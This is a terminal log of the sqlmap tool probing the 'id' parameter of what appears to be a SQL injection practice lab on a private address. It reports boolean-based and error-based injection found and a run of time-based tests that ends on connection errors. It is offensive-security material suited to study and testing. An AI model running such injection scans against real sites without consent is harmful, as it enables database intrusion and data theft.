sqlmap -u http://192.168.1.6/sqli/Less-1/?id=1
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.8#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:25:58 /2024-11-14/

[14:25:58] [INFO] testing connection to the target URL
[14:25:58] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:25:58] [INFO] testing if the target URL content is stable
[14:25:59] [INFO] target URL content is stable
[14:25:59] [INFO] testing if GET parameter 'id' is dynamic
[14:25:59] [INFO] GET parameter 'id' appears to be dynamic
[14:25:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[14:25:59] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[14:25:59] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 

[14:28:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:28:02] [WARNING] reflective value(s) found and filtering out
[14:28:02] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[14:28:02] [INFO] testing 'Generic inline queries'
[14:28:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:28:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:28:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:28:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[14:28:03] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[14:28:03] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[14:28:03] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[14:28:03] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[14:28:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:28:03] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:28:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:28:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:28:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[14:28:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[14:28:03] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:28:03] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[14:28:03] [INFO] testing 'MySQL inline queries'
[14:28:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[14:28:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[14:28:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[14:28:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[14:28:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[14:28:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[14:28:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'

[14:29:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[14:30:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[14:31:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[14:32:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[14:33:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[14:34:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[14:35:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N] 


[*] ending @ 14:35:33 /2024-11-14/
